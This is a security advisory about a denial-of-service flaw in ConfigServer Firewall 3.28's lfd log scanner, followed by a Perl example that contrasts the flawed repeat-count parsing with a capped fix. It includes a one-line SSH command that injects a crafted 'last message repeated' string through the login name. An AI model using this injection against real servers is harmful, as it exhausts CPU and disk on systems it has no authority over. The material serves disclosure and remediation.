CSF 3.28 - remote, unauthenticated users can cause prolonged, excessive CPU, disk I/O, and disk space usage, severely degrading server performance
DESCRIPTION
lfd in ConfigServer Firewall 3.28 has a subroutine called dochecks() which examines log files for various patterns of undesirable behavior. If a log line contains the string "last message repeated n times" (where "n" is one or more digits), the dochecks() subroutine is executed "n" times.
The logic looks similar to this:
    for my $log_line ( @logs ) {
        # $1 comes straight from the log line, so the loop count is attacker-influenced and unbounded
        if ( $line and $log_line =~ /last message repeated (\d+) times/ ) {
            for ( 1 .. $1 ) {
                do_checks( $line, $logfile );
            }
        }
    }
A remote user can cause the dochecks() subroutine to be run as many times as they like by injecting the "last message repeated" string into one of the monitored log files.
The following steps can be used to take advantage of this issue:
[user@host ~]$ ssh -l 'last message repeated 999999999999999999999999999999999999999 times' victim
The following will be written to /var/log/lfd.log over and over:
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 1 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 2 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 3 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 4 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 5 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: 5 login failures from x.x.x.x within the last 20 seconds - already blocked
This causes lfd.pl to consume more and more CPU over time. lfd.log can grow at 1MB/s or more, depending on the server environment and activity. This was also presumed to work via ftpd, but no other daemons were tested.
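The fix a maintainer would want for the loop above, as an added example written for this advisory rather than taken from lfd: the unbounded repeat-count lookup modelled beside a hardened form that only honours a syslog-generated repeat notice and caps the count. MAX_REPEAT, the anchored syslog line layout and the two sample log lines are assumptions constructed for the example.

```perl
#!/usr/bin/perl
# Added example, not lfd's own code. Models the repeat-count logic from the
# advisory and a hardened variant. All log lines here are constructed.
use strict;
use warnings;

# Vulnerable shape: the captured count is taken from anywhere in the line,
# including a username field, and drives the loop with no upper bound.
sub vulnerable_repeat_count {
    my ($log_line) = @_;
    return $1 if $log_line =~ /last message repeated (\d+) times/;
    return 1;
}

# Hardened shape (assumption: traditional BSD syslog layout, where a repeat
# notice is the whole message after "timestamp host"), plus a hard cap so a
# crafted count can never turn into an unbounded amount of work.
use constant MAX_REPEAT => 100;   # assumed cap; tune per site

sub hardened_repeat_count {
    my ($log_line) = @_;
    if ($log_line =~ /^\w{3}\s+\d+\s+[\d:]+\s+\S+\s+last message repeated (\d+) times$/) {
        my $n = $1;
        return $n > MAX_REPEAT ? MAX_REPEAT : $n;
    }
    return 1;   # any other line, even one that merely contains the text
}

# Constructed samples: a genuine syslog repeat notice, and a login-failure
# line whose username field carries an injected repeat string.
my @constructed = (
    'May 17 20:57:21 host last message repeated 3 times',
    'May 17 20:57:21 host sshd[123]: Invalid user last message repeated 999999999 times from x.x.x.x',
);

for my $line (@constructed) {
    my $runs = 0;
    for (1 .. hardened_repeat_count($line)) { $runs++; }   # do_checks() would run here
    printf "%-40.40s... vulnerable would loop %s time(s), hardened loops %d\n",
        $line, vulnerable_repeat_count($line), $runs;
}
```

With these inputs the vulnerable lookup returns 3 and 999999999 respectively, while the hardened lookup returns 3 and 1.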
IMPACT
Remote, unauthenticated users can severely degrade server performance, possibly filling the disk.